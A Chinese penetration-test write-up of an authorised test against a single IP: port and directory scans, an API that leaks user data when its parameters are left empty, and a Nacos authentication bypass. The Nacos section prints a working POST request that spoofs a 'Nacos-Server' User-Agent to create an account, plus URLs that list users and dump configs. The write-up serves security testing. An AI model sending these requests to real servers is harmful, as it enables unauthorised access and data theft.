对单一的ip目标测试

以下文章来源于虚拟尽头 ，作者HoAd

“ 只有一个目标的时候真的很难！”

某次对单个ip的测试

看见就一个目标，我头就大，虽然最后没有getshell，但是获取了大量的敏感信息还有利用漏洞进入后台。

1

信息搜集阶段

对于单个ip，其实渗透方式也挺简单，扫端口，扫目录。

端口扫描

我是扫了三遍的，因为我害怕有时候由于网络原因或者其他的waf什么的干扰影响，反正只有一个ip，多扫几遍也没事(授权的)。一看都是万级的端口，运维可能有些安全意识。

32710端口是主要渗透目标，只有一个登陆点。
31848端口是一个nacos的服务
其他端口都是404，或者就是白板

然后进行目录扫描，每个端口对应的站点都扫一遍。所有ip都用127.0.0.1代替

http://127.0.0.1:32701/login //登录页面
http://127.0.0.1:31800/doc.html
http://127.0.0.1:31800/swagger-ui/index.html
http://127.0.0.1:31804/doc.html
http://127.0.0.1:31804/swagger-ui/index.html
http://127.0.0.1:31805/swagger-ui/index.html
http://127.0.0.1:31805/doc.html#/home
http://127.0.0.1:31838 //报错页面
http://127.0.0.1:31838/nacos

主页使用的框架我表示我没见过，使用相关的关键字也没搜到类似的站点，推测是其公司自己开发的其他的31800，31804，31805端口使用的spring框架，可以测试有无接口权限问题，31838端口使用的是nacos服务，之前出现过一次未授权绕过漏洞。

2

测试阶段

1.32701端口

http://127.0.0.1:32701/login //登录页面

我是真滴难受，就一个登陆页面，我直接厚码，本来想着先看能不能爆出一个弱口令啥的，然后进去直接乱杀，结果，我就试了五个弱口令，就给我封了半个小时，然后我就去问要账号，结果不给，我xxxxxxxxxxx（含🐎量过多，含艹量过多）。

整个爆破目录，就只有一个login，以至于我翻了半天的js中的接口也没有找到啥可用的信息，我就去各种站点去找信息，github，云盘，fofa，结果啥都没找到，我还充了一个会员(凌风云：https://www.lingfengyun.com/)

简而言之，就是没什么jb卵用，就盲打一手，什么log4j啊，fastjson啊，乱七八糟的往上堆，说不定成功了呢，反正最后是没成功。

2. 31800端口

http://127.0.0.1:31800/doc.html

其中一个接口如下，下面是所需要的参数，很多哦，我随便填了一些，然后进行测试，发现

好吧，似乎没有漏洞，然后我就准备去pass掉进行下一个了(因为就只有两个接口)，但是可能突然想到了之前挖src的时候，可以置空参数，然后获取所有的数据。

然后我就轻轻的一试，还真的成功了，日志记录文件，有各种账号操作记录，还有该站点所有用户的敏感信息，我觉得已经可以交功了，还渗透测试什么，回家赶紧洗洗上号振刀吧。

3.31804和31805端口

http://127.0.0.1:31804/doc.html
http://127.0.0.1:31804/swagger-ui/index.html
http://127.0.0.1:31805/swagger-ui/index.html
http://127.0.0.1:31805/doc.html#/home

我一看这么多接口，就凭上面那个31800端口，这两个端口的接口岂不是在给我送业绩，于是我就遭遇到了生活的暴击

这么多接口，全需要登录，也就是验证权限，什么鸡毛都没测试出来，然后看31805

绷不住了啊兄弟们。

4.31838端口

http://127.0.0.1:31838/nacos

nacos是阿里巴巴家的东西，看到登陆框，我就试试爆破弱口令

nacos的默认账号是nacos，密码不清楚，反正试试，虽然从未爆破出来过。

然后就想到之前的nacos的身份认证绕过漏洞

试试呗，试试就逝世。

http://127.0.0.1:31848/nacos/v1/auth/users/?pageNo=1&pageSize=100

woc，有漏洞

我直接打开yakit，连接代理，上poc

POST /nacos/v1/auth/users HTTP/1.1
Host: 127.0.0.1:31848
Content-Type: application/x-www-form-urlencoded
User-Agent: Nacos-Server

username=demo&password=demo

然后使用demo，demo登录网站

可惜这里没有什么敏感信息啊，下面这个语句可以获取敏感信息，但是这个网站啥都没有

http://127.0.0.1:31848/nacos/v1/cs/configs?dataId=&group=&appName=&config_tags=&pageNo=1&pageSize=10&tenant=dev&search=accurate

成功交差，晚上回去又能给自己加一个鸡腿吃了！